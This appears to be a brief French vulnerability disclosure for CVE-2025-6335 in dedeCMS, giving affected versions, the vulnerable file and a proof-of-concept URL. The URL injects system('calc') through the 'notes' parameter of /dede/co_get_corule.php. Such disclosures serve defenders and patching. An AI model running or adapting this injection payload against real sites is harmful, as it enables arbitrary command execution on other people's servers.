
CVE-2025-6335 — exploit de preuve de concept pour une vulnérabilité d'exécution de commandes par injection de template dans dedeCMS 5.7 sp2, permettant l'exécution arbitraire de commandes via l'interface d'administration.
BUG_Author: Ewoji
Version affectée : dedeCMS < 5.7.2
Éditeur : Shanghai Zhuozhuo Network Technology Co., LTD
Logiciel : dedeCMS
Fichiers vulnérables :
/include/dedetag.class.phpAprès installation, connectez-vous à l'interface d'administration
Exploitation du modèle
/dede/co_get_corule.php/dede/co_get_corule.php?notes={dede:"); system('calc'); ///}&job=1Vérification de l'exploit :
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command